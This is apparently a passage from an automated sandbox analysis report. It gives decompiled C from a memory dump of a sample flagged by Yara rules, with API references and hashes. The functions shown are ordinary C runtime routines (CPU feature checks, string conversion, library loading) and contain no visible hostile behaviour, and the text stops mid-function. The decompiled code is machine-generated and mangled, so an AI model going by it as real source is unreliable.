            • Opcode Fuzzy Hash: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
            • Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			E0040208D(intOrPtr __edx) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				signed char _v24;
            				signed int _v28;
            				signed int _v32;
            				signed int _v36;
            				signed int _v40;
            				signed int _v44;
            				signed int _v48;
            				signed int _t59;
            				signed int _t62;
            				signed int _t63;
            				intOrPtr _t65;
            				signed int _t66;
            				signed int _t68;
            				intOrPtr _t73;
            				intOrPtr* _t75;
            				intOrPtr* _t77;
            				intOrPtr _t84;
            				intOrPtr* _t86;
            				signed int _t91;
            				signed int _t94;
            
            				_t84 = __edx;
            				 *0x412b2c =  *0x412b2c & 0x00000000;
            				 *0x412030 =  *0x412030 | 1;
            				if(IsProcessorFeaturePresent(0xa) == 0) {
            					L20:
            					return 0;
            				}
            				_v24 = _v24 & 0x00000000;
            				 *0x412030 =  *0x412030 | 0x00000002;
            				 *0x412b2c = 1;
            				_t86 =  &_v48;
            				_push(1);
            				asm("cpuid");
            				_pop(_t73);
            				 *_t86 = 0;
            				 *((intOrPtr*)(_t86 + 4)) = 1;
            				 *((intOrPtr*)(_t86 + 8)) = 0;
            				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
            				_v16 = _v48;
            				_v8 = _v36 ^ 0x49656e69;
            				_v12 = _v40 ^ 0x6c65746e;
            				_push(1);
            				asm("cpuid");
            				_t75 =  &_v48;
            				 *_t75 = 1;
            				 *((intOrPtr*)(_t75 + 4)) = _t73;
            				 *((intOrPtr*)(_t75 + 8)) = 0;
            				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
            				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
            					L9:
            					_t91 =  *0x412b30; // 0x2
            					L10:
            					_v32 = _v36;
            					_t59 = _v40;
            					_v8 = _t59;
            					_v28 = _t59;
            					if(_v16 >= 7) {
            						_t65 = 7;
            						_push(_t75);
            						asm("cpuid");
            						_t77 =  &_v48;
            						 *_t77 = _t65;
            						 *((intOrPtr*)(_t77 + 4)) = _t75;
            						 *((intOrPtr*)(_t77 + 8)) = 0;
            						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
            						_t66 = _v44;
            						_v24 = _t66;
            						_t59 = _v8;
            						if((_t66 & 0x00000200) != 0) {
            							 *0x412b30 = _t91 | 0x00000002;
            						}
            					}
            					if((_t59 & 0x00100000) != 0) {
            						 *0x412030 =  *0x412030 | 0x00000004;
            						 *0x412b2c = 2;
            						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
            							asm("xgetbv");
            							_v20 = _t59;
            							_v16 = _t84;
            							if((_v20 & 0x00000006) == 6 && 0 == 0) {
            								_t62 =  *0x412030; // 0x2f
            								_t63 = _t62 | 0x00000008;
            								 *0x412b2c = 3;
            								 *0x412030 = _t63;
            								if((_v24 & 0x00000020) != 0) {
            									 *0x412b2c = 5;
            									 *0x412030 = _t63 | 0x00000020;
            								}
            							}
            						}
            					}
            					goto L20;
            				}
            				_t68 = _v48 & 0x0fff3ff0;
            				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
            					_t94 =  *0x412b30; // 0x2
            					_t91 = _t94 | 0x00000001;
            					 *0x412b30 = _t91;
            					goto L10;
            				} else {
            					goto L9;
            				}
            			}

            APIs
            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004020A6
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FeaturePresentProcessor
            • String ID:
            • API String ID: 2325560087-3916222277
            • Opcode ID: b5824543732270ab0b84e6c6534a0c658c0f0c8495c1d5a659de4557b6608cfa
            • Instruction ID: 00a0b3a4e6e1703bd72bf57860e68eebd2cbb95fa7def28fde3004e4e54fdf29
            • Opcode Fuzzy Hash: b5824543732270ab0b84e6c6534a0c658c0f0c8495c1d5a659de4557b6608cfa
            • Instruction Fuzzy Hash: 02515AB19102099BDB15CFA9DA8979ABBF4FB08314F14C57AD804EB390D3B8A915CF58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004067FE() {
            				signed int _t3;
            
            				_t3 = GetProcessHeap();
            				 *0x4132b0 = _t3;
            				return _t3 & 0xffffff00 | _t3 != 0x00000000;
            			}

            APIs
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: HeapProcess
            • String ID:
            • API String ID: 54951025-0
            • Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
            • Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
            • Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
            • Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 70%
            			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
            				signed int _v8;
            				int _v12;
            				void* _v24;
            				signed int _t49;
            				signed int _t54;
            				int _t56;
            				signed int _t58;
            				short* _t60;
            				signed int _t64;
            				short* _t68;
            				int _t76;
            				short* _t79;
            				signed int _t85;
            				signed int _t88;
            				void* _t93;
            				void* _t94;
            				int _t96;
            				short* _t99;
            				int _t101;
            				int _t103;
            				signed int _t104;
            				short* _t105;
            				void* _t108;
            
            				_push(__ecx);
            				_push(__ecx);
            				_t49 =  *0x412014; // 0xf8d2dd75
            				_v8 = _t49 ^ _t104;
            				_t101 = _a20;
            				if(_t101 > 0) {
            					_t76 = E004080D8(_a16, _t101);
            					_t108 = _t76 - _t101;
            					_t4 = _t76 + 1; // 0x1
            					_t101 = _t4;
            					if(_t108 >= 0) {
            						_t101 = _t76;
            					}
            				}
            				_t96 = _a32;
            				if(_t96 == 0) {
            					_t96 =  *( *_a4 + 8);
            					_a32 = _t96;
            				}
            				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
            				_v12 = _t54;
            				if(_t54 == 0) {
            					L38:
            					E004018CC();
            					return _t54;
            				} else {
            					_t93 = _t54 + _t54;
            					_t83 = _t93 + 8;
            					asm("sbb eax, eax");
            					if((_t93 + 0x00000008 & _t54) == 0) {
            						_t79 = 0;
            						__eflags = 0;
            						L14:
            						if(_t79 == 0) {
            							L36:
            							_t103 = 0;
            							L37:
            							E004063D5(_t79);
            							_t54 = _t103;
            							goto L38;
            						}
            						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
            						_t119 = _t56;
            						if(_t56 == 0) {
            							goto L36;
            						}
            						_t98 = _v12;
            						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
            						_t103 = _t58;
            						if(_t103 == 0) {
            							goto L36;
            						}
            						if((_a12 & 0x00000400) == 0) {
            							_t94 = _t103 + _t103;
            							_t85 = _t94 + 8;
            							__eflags = _t94 - _t85;
            							asm("sbb eax, eax");
            							__eflags = _t85 & _t58;
            							if((_t85 & _t58) == 0) {
            								_t99 = 0;
            								__eflags = 0;
            								L30:
            								__eflags = _t99;
            								if(__eflags == 0) {
            									L35:
            									E004063D5(_t99);
            									goto L36;
            								}
            								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
            								__eflags = _t60;
            								if(_t60 == 0) {
            									goto L35;
            								}
            								_push(0);
            								_push(0);
            								__eflags = _a28;
            								if(_a28 != 0) {
            									_push(_a28);
            									_push(_a24);
            								} else {
            									_push(0);
            									_push(0);
            								}
            								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
            								__eflags = _t103;
            								if(_t103 != 0) {
            									E004063D5(_t99);
            									goto L37;
            								} else {
            									goto L35;
            								}
            							}
            							_t88 = _t94 + 8;
            							__eflags = _t94 - _t88;
            							asm("sbb eax, eax");
            							_t64 = _t58 & _t88;
            							_t85 = _t94 + 8;
            							__eflags = _t64 - 0x400;
            							if(_t64 > 0x400) {
            								__eflags = _t94 - _t85;
            								asm("sbb eax, eax");
            								_t99 = E00403E3D(_t85, _t64 & _t85);
            								_pop(_t85);
            								__eflags = _t99;
            								if(_t99 == 0) {
            									goto L35;
            								}
            								 *_t99 = 0xdddd;
            								L28:
            								_t99 =  &(_t99[4]);
            								goto L30;
            							}
            							__eflags = _t94 - _t85;
            							asm("sbb eax, eax");
            							E004018E0();
            							_t99 = _t105;
            							__eflags = _t99;
            							if(_t99 == 0) {
            								goto L35;
            							}
            							 *_t99 = 0xcccc;
            							goto L28;
            						}
            						_t68 = _a28;
            						if(_t68 == 0) {
            							goto L37;
            						}
            						_t123 = _t103 - _t68;
            						if(_t103 > _t68) {
            							goto L36;
            						}
            						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
            						if(_t103 != 0) {
            							goto L37;
            						}
            						goto L36;
            					}
            					asm("sbb eax, eax");
            					_t70 = _t54 & _t93 + 0x00000008;
            					_t83 = _t93 + 8;
            					if((_t54 & _t93 + 0x00000008) > 0x400) {
            						__eflags = _t93 - _t83;
            						asm("sbb eax, eax");
            						_t79 = E00403E3D(_t83, _t70 & _t83);
            						_pop(_t83);
            						__eflags = _t79;
            						if(__eflags == 0) {
            							goto L36;
            						}
            						 *_t79 = 0xdddd;
            						L12:
            						_t79 =  &(_t79[4]);
            						goto L14;
            					}
            					asm("sbb eax, eax");
            					E004018E0();
            					_t79 = _t105;
            					if(_t79 == 0) {
            						goto L36;
            					}
            					 *_t79 = 0xcccc;
            					goto L12;
            				}
            			}

            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
            • __alloca_probe_16.LIBCMT ref: 00407961
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
            • __alloca_probe_16.LIBCMT ref: 00407A46
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
            • __freea.LIBCMT ref: 00407AB6
              • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            • __freea.LIBCMT ref: 00407ABF
            • __freea.LIBCMT ref: 00407AE4
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
            • String ID:
            • API String ID: 3864826663-0
            • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
            • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
            • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
            • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 72%
            			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
            				signed int _v8;
            				signed char _v15;
            				char _v16;
            				void _v24;
            				short _v28;
            				char _v31;
            				void _v32;
            				long _v36;
            				intOrPtr _v40;
            				void* _v44;
            				signed int _v48;
            				signed char* _v52;
            				long _v56;
            				int _v60;
            				void* __ebx;
            				signed int _t78;
            				signed int _t80;
            				int _t86;
            				void* _t93;
            				long _t96;
            				void _t104;
            				void* _t111;
            				signed int _t115;
            				signed int _t118;
            				signed char _t123;
            				signed char _t128;
            				intOrPtr _t129;
            				signed int _t131;
            				signed char* _t133;
            				intOrPtr* _t136;
            				signed int _t138;
            				void* _t139;
            
            				_t78 =  *0x412014; // 0xf8d2dd75
            				_v8 = _t78 ^ _t138;
            				_t80 = _a8;
            				_t118 = _t80 >> 6;
            				_t115 = (_t80 & 0x0000003f) * 0x30;
            				_t133 = _a12;
            				_v52 = _t133;
            				_v48 = _t118;
            				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
            				_v40 = _a16 + _t133;
            				_t86 = GetConsoleCP();
            				_t136 = _a4;
            				_v60 = _t86;
            				 *_t136 = 0;
            				 *((intOrPtr*)(_t136 + 4)) = 0;
            				 *((intOrPtr*)(_t136 + 8)) = 0;
            				while(_t133 < _v40) {
            					_v28 = 0;
            					_v31 =  *_t133;
            					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
            					_t123 =  *(_t129 + _t115 + 0x2d);
            					if((_t123 & 0x00000004) == 0) {
            						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
            							_push(1);
            							_push(_t133);
            							goto L8;
            						} else {
            							if(_t133 >= _v40) {
            								_t131 = _v48;
            								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
            								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
            								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
            							} else {
            								_t111 = E00407222( &_v28, _t133, 2);
            								_t139 = _t139 + 0xc;
            								if(_t111 != 0xffffffff) {
            									_t133 =  &(_t133[1]);
            									goto L9;
            								}
            							}
            						}
            					} else {
            						_t128 = _t123 & 0x000000fb;
            						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
            						_push(2);
            						_v15 = _t128;
            						 *(_t129 + _t115 + 0x2d) = _t128;
            						_push( &_v16);
            						L8:
            						_push( &_v28);
            						_t93 = E00407222();
            						_t139 = _t139 + 0xc;
            						if(_t93 != 0xffffffff) {
            							L9:
            							_t133 =  &(_t133[1]);
            							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
            							_v56 = _t96;
            							if(_t96 != 0) {
            								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
            									L19:
            									 *_t136 = GetLastError();
            								} else {
            									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
            									if(_v36 >= _v56) {
            										if(_v31 != 0xa) {
            											goto L16;
            										} else {
            											_t104 = 0xd;
            											_v32 = _t104;
            											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
            												goto L19;
            											} else {
            												if(_v36 >= 1) {
            													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
            													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
            													goto L16;
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            					goto L20;
            					L16:
            				}
            				L20:
            				E004018CC();
            				return _t136;
            			}

            APIs
            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
            • __fassign.LIBCMT ref: 004082E0
            • __fassign.LIBCMT ref: 004082FB
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
            • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
            • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
            • String ID:
            • API String ID: 1324828854-0
            • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
            • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
            • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
            • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 27%
            			E00403632(void* __ecx, intOrPtr _a4) {
            				signed int _v8;
            				signed int _v12;
            				signed int _t10;
            				int _t12;
            				int _t18;
            				signed int _t20;
            
            				_t10 =  *0x412014; // 0xf8d2dd75
            				_v8 = _t10 ^ _t20;
            				_v12 = _v12 & 0x00000000;
            				_t12 =  &_v12;
            				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
            				if(_t12 != 0) {
            					_t12 = GetProcAddress(_v12, "CorExitProcess");
            					_t18 = _t12;
            					if(_t18 != 0) {
            						E0040C15C();
            						_t12 =  *_t18(_a4);
            					}
            				}
            				if(_v12 != 0) {
            					_t12 = FreeLibrary(_v12);
            				}
            				E004018CC();
            				return _t12;
            			}

            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
            • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
            • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
            • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
            • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 79%
            			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
            				signed int _v8;
            				int _v12;
            				char _v16;
            				intOrPtr _v24;
            				char _v28;
            				void* _v40;
            				void* __ebx;
            				void* __edi;
            				signed int _t34;
            				signed int _t40;
            				int _t45;
            				int _t52;
            				void* _t53;
            				void* _t55;
            				int _t57;
            				signed int _t63;
            				int _t67;
            				short* _t71;
            				signed int _t72;
            				short* _t73;
            
            				_t34 =  *0x412014; // 0xf8d2dd75
            				_v8 = _t34 ^ _t72;
            				_push(_t53);
            				E00403F2B(_t53,  &_v28, __edx, _a4);
            				_t57 = _a24;
            				if(_t57 == 0) {
            					_t52 =  *(_v24 + 8);
            					_t57 = _t52;
            					_a24 = _t52;
            				}
            				_t67 = 0;
            				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
            				_v12 = _t40;
            				if(_t40 == 0) {
            					L15:
            					if(_v16 != 0) {
            						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
            					}
            					E004018CC();
            					return _t67;
            				}
            				_t55 = _t40 + _t40;
            				_t17 = _t55 + 8; // 0x8
            				asm("sbb eax, eax");
            				if((_t17 & _t40) == 0) {
            					_t71 = 0;
            					L11:
            					if(_t71 != 0) {
            						E00402460(_t67, _t71, _t67, _t55);
            						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
            						if(_t45 != 0) {
            							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
            						}
            					}
            					L14:
            					E004063D5(_t71);
            					goto L15;
            				}
            				_t20 = _t55 + 8; // 0x8
            				asm("sbb eax, eax");
            				_t47 = _t40 & _t20;
            				_t21 = _t55 + 8; // 0x8
            				_t63 = _t21;
            				if((_t40 & _t20) > 0x400) {
            					asm("sbb eax, eax");
            					_t71 = E00403E3D(_t63, _t47 & _t63);
            					if(_t71 == 0) {
            						goto L14;
            					}
            					 *_t71 = 0xdddd;
            					L9:
            					_t71 =  &(_t71[4]);
            					goto L11;
            				}
            				asm("sbb eax, eax");
            				E004018E0();
            				_t71 = _t73;
            				if(_t71 == 0) {
            					goto L14;
            				}
            				 *_t71 = 0xcccc;
            				goto L9;
            			}

            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
            • __alloca_probe_16.LIBCMT ref: 0040633D
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
            • __freea.LIBCMT ref: 004063A9
              • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
            • String ID:
            • API String ID: 313313983-0
            • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
            • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
            • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
            • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00409BDD(void* __eflags, signed int _a4) {
            				intOrPtr _t13;
            				void* _t21;
            				signed int _t33;
            				long _t35;
            
            				_t33 = _a4;
            				if(E00405D6E(_t33) != 0xffffffff) {
            					_t13 =  *0x4130a0; // 0x577d30
            					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
            						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
            							goto L7;
            						} else {
            							goto L6;
            						}
            					} else {
            						L6:
            						_t21 = E00405D6E(2);
            						if(E00405D6E(1) == _t21) {
            							goto L1;
            						}
            						L7:
            						if(CloseHandle(E00405D6E(_t33)) != 0) {
            							goto L1;
            						}
            						_t35 = GetLastError();
            						L9:
            						E00405CDD(_t33);
            						 *((char*)( *((intOrPtr*)(0x4130a0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
            						if(_t35 == 0) {
            							return 0;
            						}
            						return E004047FB(_t35) | 0xffffffff;
            					}
            				}
            				L1:
            				_t35 = 0;
            				goto L9;
            			}

            APIs
            • CloseHandle.KERNEL32(00000000,00000000,?,?,00409AFB,?), ref: 00409C33
            • GetLastError.KERNEL32(?,00409AFB,?), ref: 00409C3D
            • __dosmaperr.LIBCMT ref: 00409C68
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CloseErrorHandleLast__dosmaperr
            • String ID: 0}W
            • API String ID: 2583163307-3031760750
            • Opcode ID: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
            • Instruction ID: 87f0d20415a4ba4edce453f192d75aa6f60acf784ef8f37888f2bef7d94c0d71
            • Opcode Fuzzy Hash: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
            • Instruction Fuzzy Hash: 12014832A0815056E2242735A989B6F77C9DB82B34F28013FF809B72C3DE389C82919C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			E00405751(signed int _a4) {
            				signed int _t9;
            				void* _t13;
            				signed int _t15;
            				WCHAR* _t22;
            				signed int _t24;
            				signed int* _t25;
            				void* _t27;
            
            				_t9 = _a4;
            				_t25 = 0x412fc8 + _t9 * 4;
            				_t24 =  *_t25;
            				if(_t24 == 0) {
            					_t22 =  *(0x40cd48 + _t9 * 4);
            					_t27 = LoadLibraryExW(_t22, 0, 0x800);
            					if(_t27 != 0) {
            						L8:
            						 *_t25 = _t27;
            						if( *_t25 != 0) {
            							FreeLibrary(_t27);
            						}
            						_t13 = _t27;
            						L11:
            						return _t13;
            					}
            					_t15 = GetLastError();
            					if(_t15 != 0x57) {
            						_t27 = 0;
            					} else {
            						_t15 = LoadLibraryExW(_t22, _t27, _t27);
            						_t27 = _t15;
            					}
            					if(_t27 != 0) {
            						goto L8;
            					} else {
            						 *_t25 = _t15 | 0xffffffff;
            						_t13 = 0;
            						goto L11;
            					}
            				}
            				_t4 = _t24 + 1; // 0xf8d2dd76
            				asm("sbb eax, eax");
            				return  ~_t4 & _t24;
            			}

            APIs
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
            • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID:
            • API String ID: 3177248105-0
            • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
            • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
            • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
            • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 71%
            			E00404320(void* __ebx, void* __ecx, void* __edx) {
            				void* __edi;
            				void* __esi;
            				intOrPtr _t2;
            				void* _t3;
            				void* _t4;
            				intOrPtr _t9;
            				void* _t11;
            				void* _t20;
            				void* _t21;
            				void* _t23;
            				void* _t25;
            				void* _t27;
            				void* _t29;
            				void* _t31;
            				void* _t32;
            				long _t36;
            				long _t37;
            				void* _t40;
            
            				_t29 = __edx;
            				_t23 = __ecx;
            				_t20 = __ebx;
            				_t36 = GetLastError();
            				_t2 =  *0x412064; // 0x7
            				_t42 = _t2 - 0xffffffff;
            				if(_t2 == 0xffffffff) {
            					L2:
            					_t3 = E00403ECE(_t23, 1, 0x364);
            					_t31 = _t3;
            					_pop(_t25);
            					if(_t31 != 0) {
            						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
            						__eflags = _t4;
            						if(_t4 != 0) {
            							E00404192(_t25, _t31, 0x4132a4);
            							E00403E03(0);
            							_t40 = _t40 + 0xc;
            							__eflags = _t31;
            							if(_t31 == 0) {
            								goto L9;
            							} else {
            								goto L8;
            							}
            						} else {
            							_push(_t31);
            							goto L4;
            						}
            					} else {
            						_push(_t3);
            						L4:
            						E00403E03();
            						_pop(_t25);
            						L9:
            						SetLastError(_t36);
            						E00403E8B(_t20, _t29, _t31, _t36);
            						asm("int3");
            						_push(_t20);
            						_push(_t36);
            						_push(_t31);
            						_t37 = GetLastError();
            						_t21 = 0;
            						_t9 =  *0x412064; // 0x7
            						_t45 = _t9 - 0xffffffff;
            						if(_t9 == 0xffffffff) {
            							L12:
            							_t32 = E00403ECE(_t25, 1, 0x364);
            							_pop(_t27);
            							if(_t32 != 0) {
            								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
            								__eflags = _t11;
            								if(_t11 != 0) {
            									E00404192(_t27, _t32, 0x4132a4);
            									E00403E03(_t21);
            									__eflags = _t32;
            									if(_t32 != 0) {
            										goto L19;
            									} else {
            										goto L18;
            									}
            								} else {
            									_push(_t32);
            									goto L14;
            								}
            							} else {
            								_push(_t21);
            								L14:
            								E00403E03();
            								L18:
            								SetLastError(_t37);
            							}
            						} else {
            							_t32 = E00405878(_t25, _t45, _t9);
            							if(_t32 != 0) {
            								L19:
